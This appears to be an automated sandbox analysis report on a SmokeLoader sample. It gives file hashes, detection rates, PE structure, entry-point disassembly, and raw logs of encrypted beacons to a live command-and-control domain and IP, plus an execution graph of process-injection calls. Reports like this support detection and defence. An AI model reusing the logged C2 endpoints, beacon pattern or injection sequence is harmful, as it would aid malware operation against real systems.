    FNzQAE7DvU.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, SmokeLoader, Socks5SystemzBrowse
    • 91.215.85.120

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    HETZNER-ASDEQi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
    • 188.40.141.211
    br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
    • 188.40.141.211
    53QoH91Zg3.exeGet hashmaliciousUnknownBrowse
    • 88.99.2.111
    7GfciIf7ys.exeGet hashmaliciousUnknownBrowse
    • 213.239.213.220
    2pFytt52ws.exeGet hashmaliciousUnknownBrowse
    • 95.216.22.24
    53QoH91Zg3.exeGet hashmaliciousUnknownBrowse
    • 195.201.62.78
    http://manga-netflix10737.tinyblogging.com.xx3.kz/Get hashmaliciousUnknownBrowse
    • 138.201.139.144
    https://monogogo.info/JQJMLAWN#em=npaladino@bigge.comGet hashmaliciousPhisherBrowse
    • 46.4.15.55
    http://www.lesliehawes.comGet hashmaliciousUnknownBrowse
    • 135.181.16.82
    KKveTTgaAAsecNNaaaa.sh4.elfGet hashmaliciousUnknownBrowse
    • 46.4.110.10

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Roaming\ifvwgru

    Download File
    Process:C:\Windows\explorer.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):171008
    Entropy (8bit):6.91421044707207
    Encrypted:false
    SSDEEP:3072:fW29LkwhSw/x6rO8zjODXz4QMmKdXNPZfu0ICVy45Wr6QL:f39Llp/6O8zjODLMmKdXNI0ICVer6
    MD5:5C86694B89A930B319F453E541D17869
    SHA1:3E476F9253D814620A2FA2B9BD19374D420A3C67
    SHA-256:49B527DACC10E6D0E9D2924ECC4E59A8D727D5A2EB89AEA324D303F4C8E7BA28
    SHA-512:F6C8913125E2F93D73C6358149398D49CA8703D8032DC8EE6314F9B6803C7A96CBF4DFDC3AC82D67B29F222E37114885F27402BCFC6688C0A5BD98B7C08CFE7A
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 74%
    • Antivirus: Virustotal, Detection: 77%, Browse
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...I..d......................n...................@.......................... p.....1...........................................(.....o.8Z..........................................................h...@...............@............................text............................... ..`.rdata...(.......*..................@..@.data....m......J..................@....rsrc...8Z....o..\...@..............@..@........................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Roaming\ifvwgru:Zone.Identifier

    Download File
    Process:C:\Windows\explorer.exe
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:true
    Reputation:high, very likely benign file
    Preview:[ZoneTransfer]....ZoneId=0

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):6.91421044707207
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.94%
    • Clipper DOS Executable (2020/12) 0.02%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • VXD Driver (31/22) 0.00%
    File name:vwaoMjcyAw.exe
    File size:171'008 bytes
    MD5:5c86694b89a930b319f453e541d17869
    SHA1:3e476f9253d814620a2fa2b9bd19374d420a3c67
    SHA256:49b527dacc10e6d0e9d2924ecc4e59a8d727d5a2eb89aea324d303f4c8e7ba28
    SHA512:f6c8913125e2f93d73c6358149398d49ca8703d8032dc8ee6314f9b6803c7a96cbf4dfdc3ac82d67b29f222e37114885f27402bcfc6688c0a5bd98b7c08cfe7a
    SSDEEP:3072:fW29LkwhSw/x6rO8zjODXz4QMmKdXNPZfu0ICVy45Wr6QL:f39Llp/6O8zjODLMmKdXNI0ICVer6
    TLSH:7EF3BE21B9F2903EE6F796B5593196E05E3FBC636AB4818F3254136E0E322D04F25763
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...I..d...........

    File Icon

    Icon Hash:63796de961436e0f

    Static PE Info

    General

    Entrypoint:0x4018b3
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x6402DE49 [Sat Mar 4 05:59:37 2023 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:0
    File Version Major:5
    File Version Minor:0
    Subsystem Version Major:5
    Subsystem Version Minor:0
    Import Hash:85f4f1401ca36bd82fd51e7dd1026f90

    Entrypoint Preview

    Instruction
    call 00007F6DDCC08869h
    jmp 00007F6DDCC0690Eh
    mov edi, edi
    push ebp
    mov ebp, esp
    mov eax, dword ptr [ebp+08h]
    mov dword ptr [0042584Ch], eax
    pop ebp
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    sub esp, 00000328h
    mov eax, dword ptr [0042129Ch]
    xor eax, ebp
    mov dword ptr [ebp-04h], eax
    and dword ptr [ebp-00000328h], 00000000h
    push ebx
    push 0000004Ch
    lea eax, dword ptr [ebp-00000324h]
    push 00000000h
    push eax
    call 00007F6DDCC06F9Ch
    lea eax, dword ptr [ebp-00000328h]
    mov dword ptr [ebp-000002D8h], eax
    lea eax, dword ptr [ebp-000002D0h]
    add esp, 0Ch
    mov dword ptr [ebp-000002D4h], eax
    mov dword ptr [ebp-00000220h], eax
    mov dword ptr [ebp-00000224h], ecx
    mov dword ptr [ebp-00000228h], edx
    mov dword ptr [ebp-0000022Ch], ebx
    mov dword ptr [ebp-00000230h], esi
    mov dword ptr [ebp-00000234h], edi
    mov word ptr [ebp-00000208h], ss
    mov word ptr [ebp-00000214h], cs
    mov word ptr [ebp-00000238h], ds
    mov word ptr [ebp-0000023Ch], es
    mov word ptr [ebp-00000240h], fs
    mov word ptr [ebp-00000244h], gs
    pushfd
    pop dword ptr [ebp-00000210h]
    mov eax, dword ptr [ebp+04h]
    lea ecx, dword ptr [ebp+04h]
    mov dword ptr [ebp-000002D0h], 00010001h
    mov dword ptr [ebp+00000000h], eax

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x201940x28.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x26fc0000x5a38.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x1e1800x1c.rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1fb680x40.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x1e0000x140.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x1c7e60x1c800698be3d06b11144f323de0083dcbb243False0.8944198876096491data7.821971719130902IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0x1e0000x28ce0x2a0015eae4e9073e47b9fa0bc4b21890024fFalse0.36300223214285715data5.400101138961297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x210000x26da2dc0x4a00bb59a2891a3111b839a260a6ec34f912unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc0x26fc0000x5a380x5c00b5b59404fe4c3237626480fe795ec993False0.4263332201086957data4.087054066646391IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_CURSOR0x26ff4d80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
    RT_CURSOR0x26ff6080xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
    RT_ICON0x26fc3900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5345622119815668
    RT_ICON0x26fca580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4117219917012448
    RT_ICON0x26ff0000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.44592198581560283
    RT_STRING0x26ff8a00x62edata0.42983565107458915
    RT_STRING0x26ffed00x45edata0.4561717352415027
    RT_STRING0x27003300x550data0.4389705882352941
    RT_STRING0x27008800x886data0.41200733272227313
    RT_STRING0x27011080x584data0.44192634560906513
    RT_STRING0x27016900x3a8data0.4636752136752137
    RT_ACCELERATOR0x26ff4980x40data0.890625
    RT_GROUP_CURSOR0x26ff6b80x22data1.0588235294117647
    RT_GROUP_ICON0x26ff4680x30data0.9375
    RT_VERSION0x26ff6e00x1bcdata0.5630630630630631

    Imports

    DLLImport
    KERNEL32.dllSetVolumeLabelA, SetComputerNameExA, InterlockedIncrement, InterlockedDecrement, CreateJobObjectW, QueryDosDeviceA, SetCommBreak, GetTickCount, EnumResourceTypesA, GetModuleFileNameW, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, AttachConsole, VirtualAlloc, LoadLibraryA, WriteConsoleA, LocalAlloc, MoveFileA, RemoveDirectoryW, FindNextChangeNotification, GlobalFindAtomW, FindFirstVolumeMountPointA, GetModuleHandleA, GetConsoleTitleW, GetFileAttributesExW, FatalAppExitA, GetCurrentProcessId, AddConsoleAliasA, DeleteFileA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, RaiseException

    Network Behavior

    Suricata IDS Alerts

    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
    2024-08-21T07:12:54.073227+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971780192.168.2.6188.40.141.211
    2024-08-21T07:12:32.808611+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971780192.168.2.6188.40.141.211
    2024-08-21T07:12:54.307863+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971780192.168.2.6188.40.141.211
    2024-08-21T07:12:33.042264+0200TCP2039103ET MALWARE Suspected Smokeloader Activity (POST)14971780192.168.2.6188.40.141.211

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Aug 21, 2024 07:12:32.161120892 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.166003942 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.166152954 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.166377068 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.166439056 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.171164989 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.171200037 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.799855947 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.808610916 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.808644056 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:32.813435078 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.813446999 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:32.996936083 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:33.042263985 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:53.866307974 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:53.866353989 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:53.871324062 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:53.871340036 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:54.059181929 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:54.073226929 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:54.073259115 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:12:54.078010082 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:54.078250885 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:54.265165091 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:12:54.307862997 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:14:09.878695965 CEST8049717188.40.141.211192.168.2.6
    Aug 21, 2024 07:14:09.878817081 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:14:09.884497881 CEST4971780192.168.2.6188.40.141.211
    Aug 21, 2024 07:14:09.889363050 CEST8049717188.40.141.211192.168.2.6

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Aug 21, 2024 07:12:31.694510937 CEST5567053192.168.2.61.1.1.1
    Aug 21, 2024 07:12:32.159795046 CEST53556701.1.1.1192.168.2.6
    Aug 21, 2024 07:12:40.033972025 CEST5364227162.159.36.2192.168.2.6
    Aug 21, 2024 07:12:40.500245094 CEST6173953192.168.2.61.1.1.1
    Aug 21, 2024 07:12:40.507380009 CEST53617391.1.1.1192.168.2.6

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Aug 21, 2024 07:12:31.694510937 CEST192.168.2.61.1.1.10xe17bStandard query (0)selebration17io.ioA (IP address)IN (0x0001)false
    Aug 21, 2024 07:12:40.500245094 CEST192.168.2.61.1.1.10xac09Standard query (0)56.126.166.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Aug 21, 2024 07:12:32.159795046 CEST1.1.1.1192.168.2.60xe17bNo error (0)selebration17io.io188.40.141.211A (IP address)IN (0x0001)false
    Aug 21, 2024 07:12:40.507380009 CEST1.1.1.1192.168.2.60xac09Name error (3)56.126.166.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

    HTTP Request Dependency Graph

    • atahmsiplorwquuw.net
      • selebration17io.io
    • brprnhfudhwwlf.org
    • mwqxqnqsqljxlnw.org
    • aeuothcasbr.com

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.649717188.40.141.211804004C:\Windows\explorer.exe
    TimestampBytes transferredDirectionData
    Aug 21, 2024 07:12:32.166377068 CEST288OUTPOST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://atahmsiplorwquuw.net/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 323
    Host: selebration17io.io
    Aug 21, 2024 07:12:32.166439056 CEST323OUTData Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 f7 d9 52 d4
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bOR<##Z!I1=,NkfmsI]4y>6+3C8E&~{X[I})<}e?i|q9DO':P:2Nk..d]U
    Aug 21, 2024 07:12:32.799855947 CEST151INHTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:32 GMT
    Data Raw: 03 00 00 00 1f 3d 19
    Data Ascii: =
    Aug 21, 2024 07:12:32.808610916 CEST286OUTPOST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://brprnhfudhwwlf.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 357
    Host: selebration17io.io
    Aug 21, 2024 07:12:32.808644056 CEST357OUTData Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 c8 8a 14 62 cd d6 4f 96 a0 de 2d a9
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bO-"o*q:c[%]i*=QN/P?lu-uSah1<'U,D3+if_uojH.PiE0lHu7MSH7o~X-kl
    Aug 21, 2024 07:12:32.996936083 CEST144INHTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:32 GMT
    Aug 21, 2024 07:12:53.866307974 CEST287OUTPOST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://mwqxqnqsqljxlnw.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 364
    Host: selebration17io.io
    Aug 21, 2024 07:12:53.866353989 CEST364OUTData Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fe aa 4c da
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bOL3e5g.4t0B<$*7I,@`&]!:n"L-7Bm-DY9W.U&tE)"bY-;JJ%BH<83xB={aJ=o,
    Aug 21, 2024 07:12:54.059181929 CEST151INHTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 7
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:53 GMT
    Data Raw: 03 00 00 00 1f 3d 19
    Data Ascii: =
    Aug 21, 2024 07:12:54.073226929 CEST283OUTPOST /index.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://aeuothcasbr.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 168
    Host: selebration17io.io
    Aug 21, 2024 07:12:54.073259115 CEST168OUTData Raw: 48 9d f8 c4 4b 63 57 52 5d 07 24 53 7d a9 50 c0 20 6b e5 14 ff 68 a8 d9 c1 69 a0 f5 0a 84 d5 91 85 ac fc c0 73 41 92 b6 aa 28 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 c8 8a 14 62 cd d6 4f 96 e8 ac 40 c4
    Data Ascii: HKcWR]$S}P khisA(jqJ,,P;}f=B!bO@sl.!uaB8&20rN5ZRszM6/C+oL
    Aug 21, 2024 07:12:54.265165091 CEST144INHTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Content-Length: 0
    Content-Type: application/octet-stream
    Date: Wed, 21 Aug 2024 05:12:54 GMT


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    Behavior

    Click to jump to process

    System Behavior

    General

    Target ID:0
    Start time:01:12:08
    Start date:21/08/2024
    Path:C:\Users\user\Desktop\vwaoMjcyAw.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\vwaoMjcyAw.exe"
    Imagebase:0x400000
    File size:171'008 bytes
    MD5 hash:5C86694B89A930B319F453E541D17869
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
    Reputation:low
    Has exited:true

    General

    Target ID:2
    Start time:01:12:13
    Start date:21/08/2024
    Path:C:\Windows\explorer.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\Explorer.EXE
    Imagebase:0x7ff609140000
    File size:5'141'208 bytes
    MD5 hash:662F4F92FDE3557E86D110526BB578D5
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
    Reputation:high
    Has exited:false

    General

    Target ID:6
    Start time:01:12:31
    Start date:21/08/2024
    Path:C:\Users\user\AppData\Roaming\ifvwgru
    Wow64 process (32bit):true
    Commandline:C:\Users\user\AppData\Roaming\ifvwgru
    Imagebase:0x400000
    File size:171'008 bytes
    MD5 hash:5C86694B89A930B319F453E541D17869
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
    Antivirus matches:
    • Detection: 100%, Joe Sandbox ML
    • Detection: 74%, ReversingLabs
    • Detection: 77%, Virustotal, Browse
    Reputation:low
    Has exited:true

    Disassembly

    Reset < >

      Execution Graph

      Execution Coverage:6.5%
      Dynamic/Decrypted Code Coverage:37.8%
      Signature Coverage:55.6%
      Total number of Nodes:90
      Total number of Limit Nodes:4
      execution_graph 4598 401561 4599 401570 4598->4599 4600 401608 NtDuplicateObject 4599->4600 4610 4018dd 4599->4610 4601 401625 NtCreateSection 4600->4601 4600->4610 4602 4016a5 NtCreateSection 4601->4602 4603 40164b NtMapViewOfSection 4601->4603 4604 4016d1 4602->4604 4602->4610 4603->4602 4605 40166e NtMapViewOfSection 4603->4605 4606 4016db NtMapViewOfSection 4604->4606 4604->4610 4605->4602 4607 40168c 4605->4607 4608 401702 NtMapViewOfSection 4606->4608 4606->4610 4607->4602 4609 401724 4608->4609 4608->4610 4609->4610 4611 401729 3 API calls 4609->4611 4611->4610 4494 403005 4495 40315c 4494->4495 4496 40302f 4494->4496 4496->4495 4496->4496 4497 4030ea RtlCreateUserThread NtTerminateProcess 4496->4497 4497->4495 4498 2bb003c 4499 2bb0049 4498->4499 4511 2bb0e0f SetErrorMode SetErrorMode 4499->4511 4504 2bb0265 4505 2bb02ce VirtualProtect 4504->4505 4507 2bb030b 4505->4507 4506 2bb0439 VirtualFree 4510 2bb04be LoadLibraryA 4506->4510 4507->4506 4509 2bb08c7 4510->4509 4512 2bb0223 4511->4512 4513 2bb0d90 4512->4513 4514 2bb0dad 4513->4514 4515 2bb0dbb GetPEB 4514->4515 4516 2bb0238 VirtualAlloc 4514->4516 4515->4516 4516->4504 4570 402e07 4572 402e1a 4570->4572 4571 40193e 11 API calls 4573 402f54 4571->4573 4572->4571 4572->4573 4586 40194a 4587 40194f 4586->4587 4588 401991 Sleep 4587->4588 4589 4019ac 4588->4589 4590 401553 10 API calls 4589->4590 4591 4019bd 4589->4591 4590->4591 4658 2bb092b GetPEB 4659 2bb0972 4658->4659 4517 2d08e28 4518 2d08e46 4517->4518 4519 2d08e2d 4517->4519 4521 2d08e51 4518->4521 4528 2d095d9 4518->4528 4524 2d08e39 4519->4524 4525 2d08e48 4524->4525 4526 2d095d9 3 API calls 4525->4526 4527 2d08e38 4526->4527 4529 2d095f4 4528->4529 4530 2d095fd CreateToolhelp32Snapshot 4529->4530 4531 2d09619 Module32First 4529->4531 4530->4529 4530->4531 4532 2d09628 4531->4532 4533 2d0962e 4531->4533 4535 2d09298 4532->4535 4533->4521 4536 2d092c3 4535->4536 4537 2d092d4 VirtualAlloc 4536->4537 4538 2d0930c 4536->4538 4537->4538 4539 402eba 4542 402ecc 4539->4542 4540 402f54 4542->4540 4543 40193e 4542->4543 4544 40194f 4543->4544 4545 401991 Sleep 4544->4545 4546 4019ac 4545->4546 4548 4019bd 4546->4548 4549 401553 4546->4549 4548->4540 4550 401563 4549->4550 4551 401608 NtDuplicateObject 4550->4551 4561 4018dd 4550->4561 4552 401625 NtCreateSection 4551->4552 4551->4561 4553 4016a5 NtCreateSection 4552->4553 4554 40164b NtMapViewOfSection 4552->4554 4555 4016d1 4553->4555 4553->4561 4554->4553 4556 40166e NtMapViewOfSection 4554->4556 4557 4016db NtMapViewOfSection 4555->4557 4555->4561 4556->4553 4558 40168c 4556->4558 4559 401702 NtMapViewOfSection 4557->4559 4557->4561 4558->4553 4560 401724 4559->4560 4559->4561 4560->4561 4563 401729 4560->4563 4561->4548 4564 40172b 4563->4564 4567 401724 4563->4567 4565 4016be NtCreateSection 4564->4565 4564->4567 4566 4016d1 4565->4566 4565->4567 4566->4567 4568 4016db NtMapViewOfSection 4566->4568 4567->4561 4568->4567 4569 401702 NtMapViewOfSection 4568->4569 4569->4567

      Executed Functions

      Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
